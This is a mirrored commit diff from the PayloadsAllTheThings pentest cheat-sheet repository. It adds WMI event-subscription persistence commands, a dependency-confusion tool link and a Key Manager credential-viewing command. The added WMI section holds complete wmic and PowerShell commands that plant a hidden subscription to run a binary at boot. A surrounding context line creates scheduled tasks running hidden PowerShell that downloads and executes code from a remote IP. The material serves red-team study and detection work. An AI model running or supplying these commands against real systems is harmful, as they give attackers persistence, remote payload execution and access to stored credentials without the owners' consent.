mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Windows Management Instrumentation Event Subscription
This commit is contained in:
parent
76993f86a6
commit
5a89c6a5ca
@ -8,6 +8,11 @@
|
||||
* [Exploit](#exploitation)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [Confused](https://github.com/visma-prodsec/confused)
|
||||
|
||||
## Exploit
|
||||
|
||||
Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
|
||||
@ -24,4 +29,4 @@ Look for `npm`, `pip`, `gem` packages, the methodology is the same : you registe
|
||||
* [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
|
||||
* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
|
||||
* [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
|
||||
* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained]( https://www.youtube.com/watch?v=zFHJwehpBrU )
|
||||
* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=zFHJwehpBrU )
|
@ -367,6 +367,41 @@ schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v
|
||||
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30
|
||||
```
|
||||
|
||||
|
||||
### Windows Management Instrumentation Event Subscription
|
||||
|
||||
> An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.
|
||||
|
||||
|
||||
* **__EventFilter**: Trigger (new process, failed logon etc.)
|
||||
* **EventConsumer**: Perform Action (execute payload etc.)
|
||||
* **__FilterToConsumerBinding**: Binds Filter and Consumer Classes
|
||||
|
||||
```ps1
|
||||
# Using CMD : Execute a binary 60 seconds after Windows started
|
||||
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="WMIPersist", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
|
||||
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="WMIPersist", ExecutablePath="C:\Windows\System32\binary.exe",CommandLineTemplate="C:\Windows\System32\binary.exe"
|
||||
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"WMIPersist\"", Consumer="CommandLineEventConsumer.Name=\"WMIPersist\""
|
||||
# Remove it
|
||||
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='WMIPersist'" | Remove-WmiObject -Verbose
|
||||
|
||||
# Using Powershell (deploy)
|
||||
$FilterArgs = @{name='WMIPersist'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 60 AND TargetInstance.SystemUpTime < 90"};
|
||||
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
|
||||
$ConsumerArgs = @{name='WMIPersist'; CommandLineTemplate="$($Env:SystemRoot)\System32\binary.exe";}
|
||||
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
|
||||
$FilterToConsumerArgs = @{Filter = [Ref] $Filter; Consumer = [Ref] $Consumer;}
|
||||
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
|
||||
# Using Powershell (remove)
|
||||
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'WMIPersist'"
|
||||
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'WMIPersist'"
|
||||
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
|
||||
$FilterConsumerBindingToCleanup | Remove-WmiObject
|
||||
$EventConsumerToCleanup | Remove-WmiObject
|
||||
$EventFilterToCleanup | Remove-WmiObject
|
||||
```
|
||||
|
||||
|
||||
### Binary Replacement
|
||||
|
||||
#### Binary Replacement on Windows XP+
|
||||
@ -553,3 +588,5 @@ kerberos::tgt
|
||||
* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
|
||||
* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
|
||||
* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
|
||||
* [Persistence – WMI Event Subscription - JANUARY 21, 2020 - pentestlab](https://binary.blog/2020/01/21/persistence-wmi-event-subscription/)
|
||||
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
|
@ -23,6 +23,7 @@
|
||||
* [Wifi passwords](#wifi-passwords)
|
||||
* [Sticky Notes passwords](#sticky-notes-passwords)
|
||||
* [Passwords stored in services](#passwords-stored-in-services)
|
||||
* [Passwords stored in Key Manager](#passwords-stored-in-key-manager)
|
||||
* [Powershell History](#powershell-history)
|
||||
* [Powershell Transcript](#powershell-transcript)
|
||||
* [Password in Alternate Data Stream](#password-in-alternate-data-stream)
|
||||
@ -587,6 +588,15 @@ Invoke-SessionGopher -AllDomain -o
|
||||
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||
```
|
||||
|
||||
|
||||
### Passwords stored in Key Manager
|
||||
|
||||
:warning: This software will display its output in a GUI
|
||||
|
||||
```ps1
|
||||
rundll32 keymgr,KRShowKeyMgr
|
||||
```
|
||||
|
||||
### Powershell History
|
||||
|
||||
Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.
|
||||
|
Loading…
Reference in New Issue
Block a user